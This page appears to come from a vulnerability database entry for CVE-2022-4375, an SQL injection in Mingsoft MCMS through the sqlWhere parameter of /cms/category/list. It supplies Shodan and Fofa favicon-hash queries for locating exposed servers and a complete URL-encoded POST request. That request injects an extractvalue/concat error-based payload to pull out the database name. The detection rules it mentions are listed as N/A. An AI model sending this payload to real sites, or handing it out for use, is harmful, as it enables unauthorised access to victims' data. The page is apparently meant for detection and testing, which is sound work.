🔙 목록으로 돌아가기

CVE-2022-4375: Mingsoft MCMS - SQL Injection

TitleMingsoft MCMS - SQL Injection
Authorritikchaddha
SeverityCritical
ImpactSuccessful exploitation could lead to unauthorized access to sensitive data.
RemediationApply the vendor-supplied patch or update to the latest version.
CVSS Score9.8
EPSS Score0.31675
CVE IDCVE-2022-4375
CWE IDCWE-89,CWE-707
Shodan Queryhttp.favicon.hash:1464851260
Fofa Queryicon_hash="1464851260"
Tags cve cve2022 mingsoft mcms sqli vuln

🔍 Vulnerability Description

SQL injection vulnerability in Mingsoft MCMS up to 5.2.9 via the sqlWhere parameter in /cms/category/list.

🌐 HTTP Request

GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/4.0
Connection: close
Accept-Encoding: gzip
POST /cms/category/list HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.6 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 465
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

sqlWhere=%5b%7b%22%61%63%74%69%6f%6e%22%3a%22%22%2c%22%66%69%65%6c%64%22%3a%22%65%78%74%72%61%63%74%76%61%6c%75%65%28%30%78%37%65%2c%63%6f%6e%63%61%74%28%30%78%37%65%2c%28%64%61%74%61%62%61%73%65%28%29%29%29%29%22%2c%22%65%6c%22%3a%22%65%71%22%2c%22%6d%6f%64%65%6c%22%3a%22%63%6f%6e%74%65%6e%74%54%69%74%6c%65%22%2c%22%6e%61%6d%65%22%3a%22%e6%96%87%e7%ab%a0%e6%a0%87%e9%a2%98%22%2c%22%74%79%70%65%22%3a%22%69%6e%70%75%74%22%2c%22%76%61%6c%75%65%22%3a%22%61%22%7d%5d

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-4375.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-4375.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A